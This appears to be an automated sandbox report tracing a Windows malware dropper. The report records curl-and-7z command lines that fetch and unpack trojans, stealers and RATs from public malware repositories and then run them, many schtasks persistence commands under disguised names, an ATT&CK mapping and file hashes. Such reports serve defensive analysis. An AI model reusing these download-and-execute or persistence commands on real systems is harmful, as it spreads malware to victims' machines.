  cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\socelars.zip" "https://github.com/Princekin/malware-database/raw/main/Socelars%20Trojan/Socelars%20-%2024.09.2022.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\socelars.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1484
- - C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
    C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\socelars.zip" "https://github.com/Princekin/malware-database/raw/main/Socelars%20Trojan/Socelars%20-%2024.09.2022.zip" --ssl-no-revoke
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1292
- - C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
    "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\socelars.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\eternity.zip" "https://github.com/Princekin/malware-database/raw/main/Eternity%20Project/Eternity%20Worm%20-%2009.11.2022.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\eternity.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1440
- - C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
    C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\eternity.zip" "https://github.com/Princekin/malware-database/raw/main/Eternity%20Project/Eternity%20Worm%20-%2009.11.2022.zip" --ssl-no-revoke
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3144
- - C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
    "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\eternity.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\vidar.zip" "https://github.com/Princekin/malware-database/raw/main/Vidar%20Stealer/vidar%20-%2004.11.2022.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\vidar.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2392
- - C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
    C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\vidar.zip" "https://github.com/Princekin/malware-database/raw/main/Vidar%20Stealer/vidar%20-%2004.11.2022.zip" --ssl-no-revoke
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4672
- - C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
    "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\vidar.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\dc.zip" "https://github.com/Princekin/malware-database/raw/main/DcRat/DcRat%20-%2009.10.2022.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\dc.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3080
- - C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
    C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\dc.zip" "https://github.com/Princekin/malware-database/raw/main/DcRat/DcRat%20-%2009.10.2022.zip" --ssl-no-revoke
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4440
- - C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
    "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\dc.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\laplas.zip" "https://github.com/Princekin/malware-database/raw/main/Laplas%20Clipper/Laplas%20-%2008.12.2022%20(FUD%203%20of%2071).zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\laplas.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4620
- - C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
    C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\laplas.zip" "https://github.com/Princekin/malware-database/raw/main/Laplas%20Clipper/Laplas%20-%2008.12.2022%20(FUD%203%20of%2071).zip" --ssl-no-revoke
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2128
- - C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
    "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\laplas.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2892
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\njrat.zip" "https://github.com/ytisf/theZoo/blob/master/malware/Binaries/njRAT-v0.6.4/njRAT-v0.6.4.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\njrat.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp\njrat"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1804
- - C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
    C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\njrat.zip" "https://github.com/ytisf/theZoo/blob/master/malware/Binaries/njRAT-v0.6.4/njRAT-v0.6.4.zip" --ssl-no-revoke
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1064
- - C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
    "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\njrat.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp\njrat"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c regsvr32.exe "C:\Users\Admin\AppData\Local\Temp\ultradrp\emotet.dll"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:680
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32.exe "C:\Users\Admin\AppData\Local\Temp\ultradrp\emotet.dll"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:984
- - C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]
    C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Enumerates connected drives
    - Writes to the Master Boot Record (MBR)
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:2708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3888
- - C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]
    C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:1132
  - - C:\WINDOWS\302746537.exe
      "C:\WINDOWS\302746537.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1560
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DA78.tmp\302746537.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3540
      - C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s c:\windows\comctl32.ocx
        6⤵
        
        PID:1044
      - C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s c:\windows\mscomctl.ocx
        6⤵
        
        PID:1540
      - \??\c:\windows\antivirus-platinum.exe
        
        c:\windows\antivirus-platinum.exe
        6⤵
        
        PID:2788
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h c:\windows\antivirus-platinum.exe
        6⤵
        Views/modifies file attributes
        
        PID:4492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4928
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\Install.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3572
- - C:\Users\Admin\AppData\Local\Temp\ultradrp\Install.exe
    C:\Users\Admin\AppData\Local\Temp\ultradrp\Install.exe
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\Worm (1).exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1016
- - C:\Users\Admin\AppData\Local\Temp\ultradrp\Worm (1).exe
    "C:\Users\Admin\AppData\Local\Temp\ultradrp\Worm (1).exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2016
- - C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.exe
    C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\Genshin Impact.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:956
- - C:\Users\Admin\AppData\Local\Temp\ultradrp\Genshin Impact.exe
    "C:\Users\Admin\AppData\Local\Temp\ultradrp\Genshin Impact.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:1124
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\winsessionnet\qmazbV2JlRldI.vbe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4796
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\winsessionnet\kudjk2JZBqNfIbV0H.bat" "
        5⤵
        
        PID:4516
      - C:\winsessionnet\PortwebSaves.exe
        
        "C:\winsessionnet\PortwebSaves.exe"
        6⤵
        
        PID:4500
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.eexe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1464
- - C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.eexe
    C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.eexe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\njrat\njRAT.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\winsessionnet\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\winsessionnet\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\winsessionnet\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "UltraDropperU" /sc MINUTE /mo 14 /tr "'C:\Windows\PrintDialog\microsoft.system.package.metadata\Autogen\UltraDropper.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "UltraDropper" /sc ONLOGON /tr "'C:\Windows\PrintDialog\microsoft.system.package.metadata\Autogen\UltraDropper.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "UltraDropperU" /sc MINUTE /mo 7 /tr "'C:\Windows\PrintDialog\microsoft.system.package.metadata\Autogen\UltraDropper.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Endermanch@AntivirusPro2017E" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Downloads\[email protected]'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Endermanch@AntivirusPro2017" /sc ONLOGON /tr "'C:\Users\Public\Downloads\[email protected]'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Endermanch@AntivirusPro2017E" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Downloads\[email protected]'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1204

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "setup.eexes" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\setup.eexe.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "setup.eexe" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\setup.eexe.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "setup.eexes" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\setup.eexe.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:420

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Windows\InputMethod\Dictionaries\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\InputMethod\Dictionaries\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Windows\InputMethod\Dictionaries\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\fr-FR\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\fr-FR\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender\fr-FR\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Windows\Panther\actionqueue\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\Panther\actionqueue\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Windows\Panther\actionqueue\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\7-Zip\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files\7-Zip\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Google\Update\Offline\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\Offline\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Google\Update\Offline\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\Setup\State\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Setup\State\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\Setup\State\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "PortwebSavesP" /sc MINUTE /mo 13 /tr "'C:\Windows\Performance\WinSAT\PortwebSaves.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "PortwebSaves" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\PortwebSaves.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "PortwebSavesP" /sc MINUTE /mo 12 /tr "'C:\Windows\Performance\WinSAT\PortwebSaves.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
1.2MB

MD5
cd479d111eee1dbd85870e1c7477ad4c

SHA1
01ff945138480705d5934c766906b2c7c1a32b72

SHA256
367f8d1bfcf90ae86c0c33b0c8c9e6ec1c433c353d0663ebb44567607402c83d

SHA512
8b801bfbb933e0dc77090555fa258d416cbe9ed780fb1821aed532a979617082b29e0b6f8fb85f73a9e93c98981426c92c498a41c49f823707da3e6b7bb30128

Download Submit
C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip

Filesize
699KB

MD5
ff84853a0f564152bd0b98d3fa63e695

SHA1
47d628d279de8a0d47534f93fa5b046bb7f4c991

SHA256
3aaa9e8ea7c213575fd3ac4ec004629b4ede0de06e243f6aad3cf2403e65d3f2

SHA512
9ea41fe0652832e25fe558c6d97e9f9f85ccd8a5f4d00dbcc1525a20a953fbd76efb64d69ce0fdd53c2747159d68fcb4ac0fa340e0253b5401aebc7fb3774feb

Download Submit
C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip

Filesize
794KB

MD5
ab1187f7c6ac5a5d9c45020c8b7492fe

SHA1
0d765ed785ac662ac13fb9428840911fb0cb3c8f

SHA256
8203f1de1fa5ab346580681f6a4c405930d66e391fc8d2da665ac515fd9c430a

SHA512
bbc6594001a2802ed654fe730211c75178b0910c2d1e657399de75a95e9ce28a87b38611e30642baeae6e110825599e182d40f8e940156607a40f4baa8aeddf2

Download Submit
C:\Users\Admin\AppData\Local\Temp\DA78.tmp\302746537.bat

Filesize
348B

MD5
7d8beb22dfcfacbbc2609f88a41c1458

SHA1
52ec2b10489736b963d39a9f84b66bafbf15685f

SHA256
4aa9ed4b38514f117e6e4f326cb0a1be7f7b96199e21305e2bd6dce289d7baa2

SHA512
a26cf9168cf7450435a9fe8942445511f6fda1087db52bd73e335d6f5b544fc892999019d9291d9dcc60c3656de49688f6d63282c97706e2db286f988e44fd94

Download Submit
C:\Users\Admin\AppData\Local\Temp\dc.zip

Filesize
1.0MB

MD5
98ec05a414d61fbda2bebf65ee8a28ab

SHA1
472b24c2bc4600ab0b83b0344ef2e543e6635a79

SHA256
d62f7aa61599d5366964c419c7c2afd364e61753d1d7ba6888ae51bb65555cbd

SHA512
0773dd9151d15f989912403df1b8754884b8a802500fca307d7675f5ad78774477cf671785d0603adafa408f91258fb1d7be4b6761a117f02714e305374f9f14

Download Submit
C:\Users\Admin\AppData\Local\Temp\eternity.zip

Filesize
1.2MB

MD5
a68f97544c9b41270008b8bf68992a75

SHA1
a1ccc56eca977792cf7a751dff4ebf1f8afe8591

SHA256
eae2bbca8b001849a03bad0b21d9e876c1931685ce37876e08a9dc77e022bfad

SHA512
9bb6e21c98dada07b3c0d0c7f6addaf9d043441282fc5df4c5f348fffac047e5e662ef92a9f9df617cab79e1abbbb8648a4a3a32c1f2044aebf278fcdbdf68b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\laplas.zip

Filesize
643KB

MD5
5c2ed2918e16a5391a075cac5ea253f8

SHA1
65b69a1fbc7c7192ba16d3d82bbc5311b34ee6c6

SHA256
ff505670ae62fd1bfca0bf10d8cfb7874e3f5d5c823f5c8acf9e796cda5a1943

SHA512
f1a75b9246810613b1862c357d313ef1a681e60992a24d597380b5bcdb7e302918c3e74a7739428573e015cccf1672b789277169fee8f0db91c2f207f66189ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\njrat.zip

Filesize
248KB

MD5
4c56c93d06d5d51b4d9d7dbf6be24530

SHA1
94108467440d5a132357f2d5eaf8eae2793744d7

SHA256
7f89a1b4182b455107ef272f78939bcfcf4428e885cc8a2276e9cf222662e96c

SHA512
cb3bc59216c4abc356916551e9cb1d70c724bb67812fc3fa27e711d0c4660aecd6ac74304e1e3547b7aa54a9b6a76b5356e77626022cb8744a32fa049e4a395c

Download Submit
C:\Users\Admin\AppData\Local\Temp\socelars.zip

Filesize
5.2MB

MD5
ccaf8b6a14e94e5163c55b0b84a6a97c

SHA1
47c67a525e642808a1ce9a6ce632bc1e1fd3dfae

SHA256
966b5aa687ca823f72ed6054802e3347908fe1ace10336e682d96d5d66db68ae

SHA512
e82c8dd091dec5cb4e522296784c8e586a186af10598b6ad9f9feaa996c0898bb6988f602e8a32741a24bcb9f4c11e07d806e3323a46aeaafaee93b7cc1756c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ud.7z.exe

Filesize
335KB

MD5
76a0b06f3cc4a124682d24e129f5029b

SHA1
404e21ebbaa29cae6a259c0f7cb80b8d03c9e4c0

SHA256
3092f736f9f4fc0ecc00a4d27774f9e09b6f1d6eee8acc1b45667fe1808646a6

SHA512
